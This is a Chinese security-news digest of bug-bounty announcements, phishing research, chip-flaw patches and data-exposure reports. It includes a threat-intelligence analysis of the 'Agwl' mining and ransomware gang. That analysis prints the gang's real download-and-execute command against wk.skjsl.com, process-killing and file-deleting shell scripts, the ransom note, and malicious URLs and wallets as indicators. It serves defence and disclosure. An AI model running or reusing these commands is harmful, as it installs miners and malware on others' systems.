分类: 安全快讯

苹果将向漏洞研究者提供百万美元奖金:创企业界纪录

北京时间8月9日早间消息,据路透社报道,苹果将向网络安全研究人员提供高达100万美元的资金,以鼓励他们寻找iPhone手机的缺陷,这也成为一家企业为防范黑客而提供的最高奖励。 与其它技术提供商不同,苹果此前仅向受邀的研究人员提供奖励,这些研究人员试图在手机和云备份中发现漏洞。 周四在拉斯维加斯举行的年度黑帽安全会议上,该公司表示将向所有研究人员开放这一流程,并增加了Mac软件和其他检测目标。 100万美元的奖金仅适用于无需手机用户的任何操作即可远程访问iPhone内核的漏洞。苹果之前提供的最高奖金是20万美元。他们会在收到报告后通过软件更新解决问题,避免将其暴露给不法分子。 政府承包商和经纪人针对最有效的黑客技术支付的最高金额已经达到200万美元,他们希望借此从设备获取信息。然而,苹果的最新奖金计划与承包商公布的一些价格处于相同区间。 苹果正在采取其它措施来简化研究难度,包括提供一些已禁用某些安全措施的改版手机。漏洞攻击的主要方式就是一些软件程序,借此利用手机其软件或已安装应用中的未知缺陷。 以色列NSO Group等许多私营公司都在向政府出售黑客攻击能力。   (稿源:新浪科技,封面源自网络。)

研究称心情愉悦时更易被黑客欺骗 网络钓鱼反击战仍任重道远

佛罗里达大学的一支团队,对黑客如何利用受害者的心理来实施网络电子邮件钓鱼一事,展开了比较深入的研究。结果发现,那些心情比较愉悦的人们,相对更容易被诱骗点击钓鱼链接。换言之,如果你的心情不太好,就会相对更少地上钓鱼邮件的当。 (图自:Google,via Cnet) 该校教授 Daniela Oliveira 与 Natalie Ebner 博士一起带领了这项研究,并在本周三于拉斯维加斯举办的黑帽网络安全会议上公布了他们的研究成果,此外谷歌反滥用研究团队负责人 Elie Burszstein 也出席了会议。 作为肆虐互联网的一大祸害,网络钓鱼攻击被黑客频繁使用,以期闯入各个机构内网、或获取密码等个人敏感信息。根据 Verizon 的年度报告,电子邮件是网络钓鱼的高发地、也是导致数据泄露的主要原因。 Elie Burszstein 表示,谷歌每天都会阻止大约 1 亿封网络钓鱼邮件,但欺诈者的变化实在太快,有些变种甚至只间隔了 7 分钟。 攻击者不断地改变和更新他们的设计,以使之发挥出最大的效率。其能够迅速适应较少的目标用户,使之很难被各种检测措施给发现。 鉴于网络钓鱼攻击的极度复杂性,除非启用多因素认证,否则绝大多数人还是很容易受到攻击的。亚马逊首席技术官 Werner Vogels 也曾在 AWS 峰会上表示:“总有愚蠢的人会去点击那个链接”。 然而 Daniela Oliveira 的研究表明,即便你点击了网络钓鱼链接,也不该被被愚蠢羞辱,因为这是“是个人就会犯的错误”。 在为期三周的实验期间,158 名参与者被告知他们正在参与一项有关‘人们如何使用互联网’的研究,且他们每天都会收到一封网络钓鱼邮件。 钓鱼邮件的内容,基于谷歌在网络上检出的真实案例,而研究人员会追踪他们是否点击了钓鱼邮件。结果发现,钓鱼邮件深深地利用了人性的弱点。 Daniela Oliveira 指出,钓鱼邮件依赖于人们在不假思索的情况下作出的快速决策,点击链接似乎成为了一种条件反射、而不是由基础的认知所决定的。 她表示:“我们很容易受到网络钓鱼的攻击,因为它会欺骗我们的大脑做出决策”。而在决策方面,人脑会通过两种方式来工作(参考双重过程理论)。 你的大脑会自动推进日常的活动,比如刷牙。而像购买房子这样的重大决策,则需要经过深思熟虑。以点击邮件链接为例,黑客主要利用了‘快速决策’这个人性的弱点。 谷歌反滥用研究团队负责人 Elie Burszstein 补充道:在美国、英国和澳大利亚的近半受访者中,约有一半互联网用户不知道什么叫‘网络钓鱼’。 这意味着在“防止网络钓鱼攻击”这件事上,谷歌面临着一场艰难的战斗。即便这家科技巨头千方百计地开展了宣传活动,实际效用依然惨不忍睹。 Oliveira 表示:“当你心情愉悦时,身体会自然地放松戒备。但在网络钓鱼面前,你并不需要时刻保持坏心情或紧张情绪。毕竟后台的保障措施,还是相对比较完善的”。   (稿源:cnBeta,封面源自网络。)

微软悄然修复 SWAPGS 处理器漏洞 保护 Windows 用户安全

外媒报道称,微软悄然发布了一个提升 Windows 用户安全的补丁,修复了自 2012 年以来生产的英特尔 CPU 漏洞(涉及 Ivy Bridge 之前的芯片)。据悉,SWAPGS 漏洞有些类似于臭名昭著的幽灵(Spectre)和熔毁(Meltdown)芯片缺陷,由安全公司 Bitdefender 在一年前发现。在 BlackHat 安全会议上,其终于宣布已被修补。 (图自:BitDefender,via BetaNews) Red Hat 表示,其需要对 Linux 内核进行更新,以防止 SWAPGS 漏洞影响 Intel 和 AMD 芯片 —— 即便 Bitdefender 称未在 AMD 处理器上发现任何问题。 作为微软上个月的‘星期二补丁’的一部分,其彻底修复了 CVE-2019-1125 安全漏洞。Bitdefender 表示,旧款英特尔芯片可能也很脆弱,但目前尚无法证明。 该公司仅在数量有限的 AMD 处理器平台上进行了测试,因此无法知晓 Red Hat 的建议是否可信。这家 Linux 发行商称: 我已意识到另一个类似于 Vi 的攻击向量,这需要对 Linux 内核进行更新。此附加攻击的媒介,基于先前内核更新中提供的现有软件修复,仅针对使用 Intel 或 AMD 处理器的 x86-64系统。 该漏洞被命名为 CVE-2019-1125,评估等级为中等。无特权的本地攻击者,可借此绕过传统的内存安全限制机制,获得对特权内存的读取访问权限。 除了更新内核和重启系统,没有已知的完全缓解措施。在打上这个内核修复补丁前,请先修复幽灵(Spectre)处理器安全漏洞。 其建议客户采取基于风险控制的解决方案,来缓解 SWAPGS 处理器安全漏洞的影响。对于需要高度安全性和信任的系统,请将其与不受信任的系统隔离,直到完整修复补丁的出现。 需要注意的是,根据行业的反馈,我们不知道在基于 Linux 内核的系统上,是否有任何利用此漏洞的已知方法。 AMD 发表声明称:该公司已意识到新研究所声称的新型推测性执行攻击,它可能允许攻击者访问需要特别权限的内核数据。 不过基于外部和内部的分析,AMD 都不认为自家产品易受到 SWAPGS 变体攻击的影响,因为 AMD 产品在设计上就不会在 SWAPGS 推测新的 GS 值。 至于非 SWAPGS 类型的变体攻击,AMD 依然给出与幽灵(Spectre)及其衍生漏洞相同的修补建议。感兴趣的朋友,可以查看 Bitdefender 制作的概念解析视频。   (稿源:cnBeta,封面源自网络。)

Agwl 病毒团伙对 Linux 系统的三连击:挖矿、DDoS、删库勒索

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/wCjKwENZajw1vA9dmdgftQ   腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。 一、背景 腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。“Agwl”团伙于2018年7月被御见威胁情报中心发现,其攻击特点为探测phpStudy搭建的网站,并针对其网站搭建时使用的默认的MySQL弱口令进行爆破登录,从而植入挖矿以及远控木马。 该团伙早期入侵后植入的都是基于Windows平台的木马,其挖矿木马部分会首选清除其他挖矿程序、阻止其他挖矿木马访问矿池、独享系统资源。而最近的更新中,我们监测发现,“Agwl”团伙增加了对Linux系统的攻击,入侵成功后加入基于Linux系统执行的bash脚本代码s667。该脚本运行后会添加自身到定时任务,并进一步下载Linux平台下的CPU挖矿木马bashf和GPU挖矿木马bashg。 然而此时攻击并没有结束,“Agwl”团伙会继续植入Linux平台的DDoS病毒lst(有国外研究者命名为“Mayday”)以及勒索蠕虫病毒Xbash。Xbash勒索病毒会从C2服务器读取攻击IP地址段,扫描这些网络中的VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin服务器进行爆破攻击,爆破登录成功后不像其他勒索病毒那样去加密数据再勒索酬金,而是直接将数据库文件删除后骗取酬金,企业一旦中招将会遭受严重损失。 “Agwl”团伙攻击流程 二、详细分析 中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码并且开启在外网3306端口。在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。攻击者使用MySQL弱口令登录后,在web目录下执行Shell,并在其中添加植入挖矿木马的恶意代码。 入侵后执行shell命令为: cmd.exe /c “certutil.exe -urlcache -split -f http://wk.skjsl.com:93/Down.exe &Down.exe &del Down.exe&cd /tmp &&wget http://wk.skjsl.com:93/s667 &chmod 777 s667&./s667 “Agwl”团伙对Windows平台植入的木马为Down.exe,针对Linux平台植入的是s667。 Down.exe Down.exe为自解压程序,解压后释放一个hosts文件和7个BAT文件。根据解压命令,文件被释放到C:\Windows\debug\SYSTEM 目录下,首先被执行的是start.bat Start.bat主要功能为: 创建目录C:\ProgramData\Microsoft\test并设置为隐藏,将down.bat、open.bat、skycmd.bat拷贝到该目录中并安装为计划任务反复执行,对应的计划任务名分别为“SYSTEM”、“DNS”、“skycmd”;然后从www[.]kuaishounew.com下载wget.exe作为后续下载工具;最后启动start2.bat。 Start2.bat的功能为: 利用start.bat中下载的wget.exe从微软官方下载vc_redist.x64.exe,从www[.]kuaishounew.com下载unzip.exe(后续用到的解压工具)和hook.exe,然后执行install3.bat。 (vcredist_x64.exe是微软的Visual C运行时库,安装后能够在未安装VC的电脑上运行由 Visual C++开发的64位应用,该模块被下载以保证64位木马正常运行。) Install3.bat主要用于木马的三个服务“SYSTEM”、“DNS”、“skycmd”的安装和保持。 1、服务“SYSTEM” 执行的脚本为down.bat,主要功能为下载矿机程序wrsngm.zip进行挖矿,该矿机程序为开源挖矿程序xmr-stak修改而成,github地址https[:]//github.com/fireice-uk/xmr-stak。 使用矿池:wk.skjsl.com:3333 钱包:4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 该钱包上线时间不长,查询收益目前仅获得0.7个XMR 2、服务“DNS” 对应执行的脚本为open.bat。功能为替换本地域名解析文件hosts,然后启动挖矿程序。 替换后的hosts文件将其他的矿池域名解析指向127.0.0.1,阻止其正常访问从而独占挖矿所需的计算资源。从该文件中还会将木马原来的C2地址从111.230.195.174迁移至116.206.177.144。 open.bat还会启动qc.bat来清除入侵过程中在xampp、www、phpstudy目录下载残留的EXE木马,以及badboy.php、test00.php木马。 3、服务“skycmd” 执行脚本skycmd.bat。功能为下载skycmdst.txt,重命名为skycmdst.bat并执行,目前下载该文件为网页文件,但黑客可通过后台配置动态更改下载的恶意代码。 s667 s667为入侵Linux系统后首先执行的脚本。脚本判断当前是否是root权限,如果不是则下载lower23.sh到/tmp/目录并通过nohup bash命令执行;如果是root权限则添加下载执行s667的定时任务,每5分钟执行一次,然后下载rootv23.sh到/tmp/目录并通过nohup bash命令执行。 最终下载执行的bash脚本lower23.sh或root23.sh负责植入Linux版本挖矿木马、清理竞品挖矿木马以及植入其他病毒等功能。 在function kills()中对竞品挖矿木马进行清除: 1、按照进程名匹配(包括被安全厂商多次披露的利用redis入侵挖矿的木马“ddg*”、“sourplum”、”wnTKYg”)。 pkill -f sourplum pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi 2、按照矿池匹配,杀死连接指定矿池的进程 ps auxf|grep -v grep|grep “mine.moneropool.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:8080″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:3333″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “monerohash.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “/tmp/a7b104c270″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:6666″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:7777″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:443″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “stratum.f2pool.com:8888″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmrpool.eu” | awk ‘{print $2}’|xargs kill -9 3、按照端口匹配,杀死使用端口9999/5555/7777/14444进行tcp通信的进程 PORT_NUMBER=9999 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=5555 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=7777 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=14444 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 4、删除指定目录文件 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/index_bak rm -rf /tmp/httpd.conf rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270 rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq 在function downloadyam()中下载Linux挖矿程序bashg(由开源GPU挖矿程序xmr-stak编译)和配置文件pools.txt;下载Linux平台CPU挖矿程序bashf(采用开源挖矿程序XMRig编译)以及配置文件名config.json。两种挖矿程序均使用与攻击Windows平台时相同的门罗币矿池和钱包。 DDoS病毒 lower23.sh在完成挖矿功能后,还会植入基于Linux的DDoS病毒lst(国外厂商命名为Mayday) lst搜集以下信息,并将其保存至结构g_statBase中: 系统版本 CPU核心数及其时钟速率 CPU负载 网络负载 创建一个新线程CThreadTaskManager :: ProcessMain(),将开始攻击和终止攻击的命令放入执行队列。在此之后,创建一个新线程CThreadHostStatus :: ProcessMain(),在此线程中,CPU和网络负载的数据每秒更新一次,如果接到请求,可以随时将数据发送到C&C服务器。 然后创建20个线程,从任务队列中读取信息,并根据读取的信息启动攻击或终止攻击。 建立与C&C的连接后,进入处理来自C&C的消息的无限循环。如果命令具有参数,则C&C则会发送另外4个字节,病毒根据接收到的不同参数执行不同类型的DDoS攻击。 执行DDoS攻击命令协议如下: 0×01 发起攻击,参数定义攻击的类型和要使用的线程数。攻击类型由一个字节定义,该字节可以取值0x80到0x84,共有5种攻击类型: 0x80 – TCP洪水攻击。 0x81 – UDP洪水攻击。 0x82 – ICMP洪水攻击。 0x83,0x84 – 两次DNS洪水攻击。两种攻击都类似于0x81,除了端口53(DNS服务的默认端口)用作目标端口。 0x02 终止攻击。 0x03 更新配置文件。 0x04 用于将当前命令的执行状态发送到C&C服务器。 勒索蠕虫 lower23.sh继续植入在基于Linux平台执行的勒索蠕虫病毒Xbash Xbash为使用PyInstaller将Python代码打包生成的ELF格式可执行程序,用于感染Linux系统。使用工具pyi-archive_viewer可提取出其中的pyc文件,然后通过反编译程序将其还原成Python代码。 Xbash会通过弱口令爆破和已知的服务器组件漏洞进行攻击,而且会删除目标系统中的数据库,在删除数据后提示勒索比特币,然而并没有发现其具有恢复数据的功能。 扫描端口: HTTP:80,8080,8888,8000,8001,8088 VNC:5900,5901,5902,5903 MySQL:3306 Memcached:11211 MySQL/MariaDB:3309,3308,3360 3306,3307,9806,1433 FTP:21 Telnet:23,2233 PostgreSQL:5432 Redis:6379,2379 ElasticSearch:9200 MongoDB:27017 RDP:3389 UPnP/SSDP:1900 NTP:123 DNS:53 SNMP:161 LDAP:389 Rexec:512 Rlogin:513 Rsh:514 Rsync:873 Oracle数据库:1521 CouchDB:5984 对于某些服务,如VNC,Rsync,MySQL,MariaDB,Memcached,PostgreSQL,MongoDB和phpMyAdmin,如果相关端口打开,则使用内置的弱用户名/密码字典进行爆破登录 爆破登录成功后对用户的数据库进行删除: 然后在数据库中创建勒索提示文本PLEASE_README_XYZ,勒索金额为0.02个比特币: Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not recived your payment,we will leak your database’, LygJdH8fN7BCk2cwwNBRWqMZqL1′,’backupsql@pm.me 三、安全建议 加固服务器,修补服务器安全漏洞,对于phpStudy一类的集成环境,在安装结束后应及时修改MySQL密码为强密码,避免被黑客探测入侵。 服务备份重要数据,并进行内网外网隔离防止重要数据丢失。检查并去除VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin等服务器使用的弱口令。 网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。 使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 116.206.177.144 Domain down.ctosus.ru wk.skjsl.com fk3.f3322.org sbkcbig.f3322.net URL http[:]//down.ctosus.ru/bat.exe http[:]//wk.skjsl.com:93/s667 http[:]//wk.skjsl.com:93/lowerv23.sh http[:]//wk.skjsl.com:93/rootv23.sh http[:]//wk.skjsl.com:93/xlk http[:]//wk.skjsl.com/wrsngm.zip http[:]//wk.skjsl.com/downulr.txt http[:]//wk.skjsl.com/config.sjon http[:]//wk.skjsl.com/bashf http[:]//wk.skjsl.com/bashg http[:]//wk.skjsl.com/pools.txt http[:]//wk.skjsl.com/lst http[:]//wk.skjsl.com/XbashH http[:]//wk.skjsl.com/NetSyst96.dll http[:]//www.kuaishounew.com/Down.exe http[:]//www.kuaishounew.com/apps.txt http[:]//www.kuaishounew.com/hook.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/office.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/hosts http[:]//116.206.177.144/wrsngm.zip http[:]//fk3.f3322.org/skycmdst.txt md5 51d49c455bd66c9447ad52ebdb7c526a fb9922e88f71a8265e23082b8ff3d417 cacde9b9815ad834fc4fb806594eb830 17f00668f51592c215266fdbce2e4246 40834e200ef27cc87f7b996fe5d44898 3897bdb933047f7e1fcba060b7e49b40 39ea5004a6e24b9b52349f5e56e8c742 8fdfe319255e1d939fe5f4502e55deee 13f337029bae8b4167d544961befa360 1b93e030d2d6f1cef92b2b6323ff9e9e 589ba3aac5119fc4e2682bafb699727b 82d28855a99013c70348e217c162ceb9 门罗币钱包1: 4Ak2AQiC1R4hFmvfSYRXfX6JSjR6YN9E81SRvLXRzeCefRWhSXq3SKDf8ZEFmpobNkXmgXnqA3CGKgaiAEJ2pjYi8BeQcn7 门罗币钱包2: 4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 比特币钱包: 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 邮箱: backupsql@pm.me 参考链接 https://www.freebuf.com/column/195035.html https://www.freebuf.com/column/178753.html https://securelist.com/versatile-ddos-trojan-for-linux/64361/ https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

微软成立 Azure 安全实验室:最高悬赏 30 万美元

Azure是目前微软发展最快的业务之一,在提升全球覆盖率和使用率的同时微软希望将其打造成为数字领域的诺克斯堡(Fort Knox,美国最安全的小镇)。微软刚刚宣布成立了Azure安全实验室,并且欢迎世界各地的安全专家通过测试Azure安全漏洞来换取奖金报酬。 微软首席安全PM经理Kymberlee Price解释称:“Azure安全实验室的隔离允许我们提供新的东西:研究人员不仅可以研究Azure中的漏洞,还可以尝试进行修复。那些有权访问Azure安全实验室的人可以尝试基于场景的挑战,获得300,000美元的最高奖励。” 愿意加入微软新Azure安全实验室的安全研究人员可以在此页面上填写申请。新的悬赏项目对于Azure生态系统来说无疑是个好消息,它能够为使用该业务的所有客户提供更安全的环境。 Price表示:“为了感谢他们的努力以及在产生实质性危害之前缓解和解决这些问题,在过去12个月中我们已经累计发放了440万美元的悬赏。我们感谢整个行业的安全合作伙伴,并相信我们今天宣布的新计划将有助于进一步保护Azure生态系统。”   (稿源:cnBeta,封面源自网络。)  

为更快寻找 iOS 漏洞 苹果将向安全专家提供开发版 iPhone

苹果计划向安全研究人员提供特有的iPhone型号,以便于他们能更轻松的找到iOS系统的漏洞。援引福布斯报道,苹果计划在本周晚些时候召开的黑帽安全会议上宣布这条消息。 并非所有安全专家都能获得特制iPhone,仅面向此前受到苹果邀请参与BUG悬赏计划的安全研究人员。通过该计划,研究人员可以通过向苹果披露iOS漏洞以获得奖励。 一些Giulio Zompetti收藏的“dev-fused”版iPhone 图片来自于 Giulio Zompetti 那么和面向普通消费者的iPhone相比,这些特制iPhone有何不同? 一位知情人士透露,这些iPhone本质上均为“开发设备”。相比较面向普通消费者的已锁iPhone,允许开发者做更多的事情。例如,允许开发者访问传统消费者版本中不允许访问的iOS系统。更为重要的是,开发者在这些特制iPhone上能够允许停止处理器运行以及检查内存中是否存在漏洞。 一台安装在支架上的“dev-fused”版iPhone Image: Motherboard 虽然这些iPhone具备更高的自由度,但这些iPhone并不会像给内部苹果开发人员以及安全团队那样功能丰富。例如,使用这些设备的安全研究人员可能无法解密iPhone固件。目前市场上也有一些iPhone开发者机型,但是这些设备通常在黑市上销售,而且价格非常高昂。 在黑市上这些iPhone被称之为“dev-fused”版iPhone。这些“dev-fused”版iPhone并未完成量产阶段,并且取消了诸多安全功能,Motherboard在报道中将其描述为“准越狱设备”(pre-jailbroken devices)。“dev-fused”版iPhone非常罕见,如果被偷运出苹果在黑市上可以卖出数千美元。这些iPhone拥有非常高的价值,因为这些可以用于查找影响iPhone现有版本的漏洞。 一些Giulio Zompetti收藏的“dev-fused”版iPhone 图片来自于 Giulio Zompetti 世界上最知名的iOS安全研究人员之一Luca Todesco向Motherboard透露:“如果你是攻击者,要么进行暴力破解要么花费数千美元买这样一台iPhone。而不少人都选择了第二种。”Motherboard随后在推特上发现了不少出售“dev-fused”版iPhone的用户,费用最低在1800美元左右。这些卖家同时还表示他们向多名安全专家提供“dev-fused”版iPhone,而且相信很多破解iPhone的大型安全公司也在使用这些手机。不过也有卖家提供的“dev-fused”版iPhone价格更高,Motherboard发现有个iPhone XR版本售价高达20000美元。 与此同时,该报道称苹果也计划推出Mac赏金计划。这类似于iOS bug奖励,并奖励安全研究人员在macOS中发现的漏洞。早在二月份,一位安全研究人员详细介绍了macOS漏洞来访问Keychain密码,但由于缺少针对macOS的bug赏金计划,他拒绝与Apple分享详细信息。尽管该公司没有公开宣布错误赏金计划,但最终研究人员确实与苹果分享了该漏洞的详细信息。   (稿源:cnBeta,封面源自网络。)

本田汽车云端数据库未设密码 全球员工信息险遭泄露

新浪科技讯 8月1日下午消息,据台湾地区科技媒体报道,安全研究人员发现,日本汽车大厂本田汽车(Honda Motor)一个包含全球所有员工信息的数据库,由于未设密码很可能会被人一览无余。在接到通报之后,本田已经修补了相关漏洞。 7月初,安全研究人员Justin Paine在网络上发现本田汽车一个未设密码的ElasticSearch数据库,似乎是本田汽车在全球所有员工电脑的库存管理数据库。这个数据库今年3月中旬才上线,但至今累积的数据量高达40GB,包含约1.34亿份文件。 经过检查,这批陷遭暴露的数据包括几乎所有本田电脑相关信息。其中一个表格包含员工电子邮件、部门名称、本田机器主机名称、MAC位置、内网IP、操作系统版本,另一个表格则有员工姓名、部门、员工编号、帐号、手机号码及最近登录时间。研究人员甚至发现本田CEO的完整电子邮件、全名、MAC位置、Windows操作系统版本、IP及设备类型。 另外,本田公司的电脑用了哪家终端安全软件,哪些机器已安装、哪些有更新版本及哪些没有没有更新版本也一目了然。为避免成为黑客的下手目标,研究人员并未提及厂商名称。 研究人员通知本田后,后者已于当天封闭漏洞。本田表示,经过追查系统日志,未发现有任何遭到第三方人士下载的迹象,目前也没有数据外泄的证据。本田表示已做好相关强化,确保未来不会重蹈覆辙。   (稿源:新浪科技,封面源自网络。)

谷歌 Titan 安全密钥套件在加拿大、法国、日本和英国市场推出

谷歌今天宣布旗下的Titan安全密钥套件已经在加拿大、法国、日本和英国市场推出,而此前这款带有蓝牙按键和标准USB-A插口的安全密钥仅在美国地区上市发售。售价方面,在美国,Titan Key套装的售价为50美元;在加拿大价格为65加元;在法国为55欧元;英国为50英镑;日本为6000日元,均包邮送货。 这款USB安全密钥基于FIDO技术规范打造,内部固件由谷歌工程师,能够保护支持该硬件的所有平台账号。该密钥最初为为了谷歌内部使用而设计的,在对外出售之前已经在内部持续使用8个月了。USB密钥需要将设备插到电脑的USB端口展开认证,而蓝牙密钥则用于移动设备的无线认证。 它可用来保护支持该硬件的账号。Titan将有两个版本:USB版和蓝牙版。USB版,很显然需要将设备插到电脑的USB端口展开认证,而蓝牙版则用于移动设备的无线认证。获悉,两款密匙设备的套装价将在50美元左右,单独购买的话售价大概是20美元或25美元。   (稿源:cnBeta,封面源自网络。)

想要确保美 2020 总统大选的网络安全 国会剩下的时间已经不多了

2016 美国总统大选期间的种种乱象,已经深深地刻在了吃瓜群众的记忆里。而其中引发最热话题的,就是所谓的俄罗斯黑客在社交媒体上搅起的浑水。为了防止 2020 大选期间重蹈覆辙,国会已经多次呼吁携手保卫网络舆论阵地。比如上周,特别顾问 Robert Mueller 就向国会警告称:“2016 总统大选期间的事情不会一次就结果,当我们坐在这里的时候,外来的威胁还在蠢蠢欲动”。 2018 参议院结果(来自:维基百科) 今年春季,FBI 局长 Chris Wrey 亦表示:2018 中期选举,只是 2020 大选的大秀彩排。今年早些时候,国家情报总监 Dan Coats 也发出过类似的警告: 尽管人们对网络威胁的意识日渐提升,并且改善了网络防御。但几乎所有的信息、通信网络和系统,都将面来未来数年的风险。 遗憾的是,在一连串警告面前,国会的行动速度却有些跟不上。到目前为止,其仍未采取任何有意义的行动,来应对这一威胁。随着 2020 大选的临近,我们不清楚美国是否做好了比 2016 更好的准备。 一些议员提出,应以立法的方式,来帮助确保 2020 总统大选的安全,且监管应覆盖到线上政治广告、纸质选票、以及投票及的措施安全。 没想到的是,参议院多数党领袖 Mitch McConnell(R-KY),却成为了让这项议案成为法律的一个阻碍。在 Mueller 警告的第二天,民主党人有机会推翻解决这一问题的两项措施。 一是向准备 2020 大选的州授权 7.75 亿美元,并要求其追踪选票的踪迹;二是要求竞选官员报告任何外来干涉、或针对 FBI 的干扰企图 —— 然而 McConnell 将两项措施都堵死了。 除了 Mueller 的报告,参议院情报委员会上周公布了俄干涉美大选的一部分调查结果,声称全美 50 个州都成为了黑客的攻击目标,但没有证据表明其对选举结果造成了影响。 该委员会认定,俄情报部门无法删除或修改选民数据。但除了俄罗斯,伊朗也被指积极地参与到了线上虚假信息活动中,后者同样会构成安全风险。 在过去一年中,诸如 Facebook、Twitter、谷歌这样的平台,已经删除了他们确信来自伊朗、并参与欺骗行为的账户和帖子。遗憾的是,在两党警告面前,联邦政府几乎没有采取任何补救措施。   (稿源:cnBeta,封面源自网络。)

研究人员担心黑客攻击会致联网汽车变成路障

据外媒报道,随着汽车制造商不断用“智能”技术包装其最新车型,研究人员们担心联网汽车将会愈发成为黑客选择的攻击对象。来自乔治亚理工学院和Multiscale Systems的科学家们展开的一项研究显示,如果黑客在联网汽车中发现严重漏洞那么他们只需要按下一个按钮就能轻松停止整个城市的交通。 资料图 该研究的合著者Jesse Silverberg指出:“就汽车而言,令人担忧的事情之一是,目前存在的一个有效中央计算系统并且其中有很多东西。你不一定要有独立的系统来运行你的汽车和卫星广播。但如果你能进入其中一个,你或许也能进入另一个。” 虽然目前针对联网汽车的大规模黑客攻击尚未发生,但随着越来越多联网汽车的上路,潜在的严重问题正在慢慢增加。研究人员在模拟中发现一个临界点–当处于临界点之上,熄火的汽车数量会导致大量交通完全中断。在一项测试中,研究小组冻结了整个曼哈顿的交通。 参与该项目的研究助理David Yanni表示,如果是在交通高峰期,随意让20%的汽车熄路将意味着交通完全瘫痪。   (稿源:cnBeta,封面源自网络。)